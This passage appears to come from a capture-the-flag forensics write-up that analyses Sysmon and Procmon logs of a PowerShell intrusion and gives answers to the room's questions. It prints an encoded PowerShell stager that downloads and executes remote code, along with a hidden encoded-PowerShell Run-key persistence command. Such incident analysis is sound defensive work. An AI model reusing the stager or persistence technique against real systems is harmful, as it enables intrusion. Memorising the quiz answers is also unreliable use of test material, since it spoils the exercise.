AyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQ
ASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBb
ACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJ
AAyADcAQwBFAC4ASABlAGEARABlAHIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBSAGoATQBlAGUAawA9AFoAbQBRAEwASABhAGMATQBCAFgAcgBMAGMAQgArAFYARQBsAHYATABjAHcATwAyAD
YARQBZAD0AIgApADsAJABEAGEAdABBAD0AJAAyADcAQwBlAC4ARABPAHcAbgBsAG8AQQBkAEQAQQB0AEEAKAAkAFMAZQByACsAJABUACkAOwAkAGkAdgA9ACQARABhAFQAQQBbADAALgAuADMAXQA7ACQARAB
hAHQAQQA9ACQAZABBAHQAQQBbADQALgAuACQARABhAHQAYQAuAGwARQBOAGcAdABoAF0AOwAtAGoATwBJAE4AWwBDAEgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABBAHQAQQAgACgAJABJAFYAKwAkAEsA
KQApAHwASQBFAFgA
CurrentDirectory: C:\Users\Administrator\
User: WIN-Q5JJRDM876J\Administrator
LogonGuid: {786593ca-776c-6009-5ea8-030000000000}
LogonId: 0x3A85E
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160
AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
ParentProcessGuid: {786593ca-24a3-600a-e400-000000000300}
ParentProcessId: 3624
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS C:\Users\Administrator\Desktop> Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=13' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl
TimeCreated : 1/21/2021 5:08:13 PM
ProviderName : Microsoft-Windows-Sysmon
Id : 13
Message : Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell
-Win Hidden -enc $x"
# Between 1/21/2021 5:05:50 PM and 1/21/2021 5:08:13 PM
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/*' | Sort-Object TimeCreated
CreateRemoteThread, 1What is the UTC time for the first event between these 2 processes?
# 1/21/2021 5:07:06 PM
$date = [datetime]"1/21/2021 5:07:06 PM"
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath "*/System/EventID=8" | Sort-Object TimeCreated | Where-Object {$_.TimeCreated -like $date} | fl
TimeCreated : 1/21/2021 5:07:06 PM
ProviderName : Microsoft-Windows-Sysmon
Id : 8
Message : CreateRemoteThread detected:
RuleName: -
UtcTime: 2021-01-22 01:07:06.182
SourceProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
SourceProcessId: 3088
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessGuid: {786593ca-776d-6009-4b00-000000000300}
TargetProcessId: 2684
TargetImage: C:\Windows\explorer.exe
NewThreadId: 4872
StartAddress: 0x00000000027D0000
StartModule: -
StartFunction: -
2021-01-22 01:07:06.182What is the value under Date and Time? (MM/DD/YYYY H:MM:SS [AM/PM])
TimeCreated : 1/21/2021 5:07:06 PM
ProviderName : Microsoft-Windows-Sysmon
Id : 8
Message : CreateRemoteThread detected:
RuleName: -
UtcTime: 2021-01-22 01:07:06.182
SourceProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
SourceProcessId: 3088
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessGuid: {786593ca-776d-6009-4b00-000000000300}
TargetProcessId: 2684
TargetImage: C:\Windows\explorer.exe
NewThreadId: 4872
StartAddress: 0x00000000027D0000
StartModule: -
StartFunction: -
1/21/2021 5:07:06 PMWhat is the first operation listed by the 2nd process starting with the Date and Time from Q25?
# First Operation Start with 3088
# So, Procmon filter with pid
Thread CreateWhat is the full registry path that was queried by the attacker to get information about the victim?
# Filter 'Path Contains ReleaseID'
HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ReleaseIDWhat is the name of the last module in the stack from this event which had a successful result?
<unknown>Most likely what module within the attack framework was used between the 2 processes?
Invoke-PSInjectWhat is the MITRE ID for this technique?
https://attack.mitre.org/techniques/T1055/Last updated
Was this helpful?